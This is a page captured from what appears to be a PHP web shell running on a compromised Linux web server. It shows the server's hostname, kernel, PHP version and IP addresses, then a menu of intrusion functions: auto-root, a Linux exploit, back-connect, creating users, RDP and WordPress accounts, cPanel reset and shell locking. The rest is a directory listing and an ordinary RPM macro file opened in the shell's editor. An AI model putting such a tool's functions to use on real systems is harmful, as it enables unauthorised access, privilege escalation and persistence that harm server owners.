Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.6.177
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
rpm /
macros.d /
[ HOME SHELL ]
Name
Size
Permission
Action
macros.dwz
1.76
KB
-rw-r--r--
macros.efi-srpm
3
KB
-rw-r--r--
macros.environment-modules
75
B
-rw-r--r--
macros.fedora-misc
2.76
KB
-rw-r--r--
macros.fedora-misc-srpm
239
B
-rw-r--r--
macros.forge
12.43
KB
-rw-r--r--
macros.ghc-srpm
414
B
-rw-r--r--
macros.go-srpm
7.17
KB
-rw-r--r--
macros.info
390
B
-rw-r--r--
macros.kernel-srpm
116
B
-rw-r--r--
macros.ldc-srpm
73
B
-rw-r--r--
macros.ldconfig
307
B
-rw-r--r--
macros.mono-srpm
181
B
-rw-r--r--
macros.nodejs-srpm
324
B
-rw-r--r--
macros.ocaml-srpm
737
B
-rw-r--r--
macros.openblas-srpm
104
B
-rw-r--r--
macros.perl
5.06
KB
-rw-r--r--
macros.perl-srpm
794
B
-rw-r--r--
macros.pybytecompile
886
B
-rw-r--r--
macros.python
3.36
KB
-rw-r--r--
macros.python-srpm
5.95
KB
-rw-r--r--
macros.python2
1.82
KB
-rw-r--r--
macros.python3
3.63
KB
-rw-r--r--
macros.rust-srpm
61
B
-rw-r--r--
macros.selinux-policy
6.61
KB
-rw-r--r--
macros.systemd
4.03
KB
-rw-r--r--
macros.systemtap
206
B
-rw-r--r--
macros.valgrind-srpm
127
B
-rw-r--r--
macros.vpath
228
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : macros.pybytecompile
# Note that the path could itself be a python file, or a directory # Python's compile_all module only works on directories, and requires a max # recursion depth # Usage: # %py_byte_compile <interpereter> <path> # Example: # %py_byte_compile %{__python3} %{buildroot}%{_datadir}/spam/plugins/ # This will terminate build on SyntaxErrors, if you want to avoid that, # use it in a subshell like this: # (%{py_byte_compile <interpereter> <path>}) || : %py_byte_compile()\ python_binary="%1"\ buildroot_path="%2"\ bytecode_compilation_path=".${buildroot_path/#$RPM_BUILD_ROOT}"\ failure=0\ pushd $RPM_BUILD_ROOT\ find $bytecode_compilation_path -type f -a -name "*.py" -print0 | xargs -0 $python_binary -O -m py_compile || failure=1\ find $bytecode_compilation_path -type f -a -name "*.py" -print0 | xargs -0 $python_binary -m py_compile || failure=1\ popd\ test $failure -eq 0
Close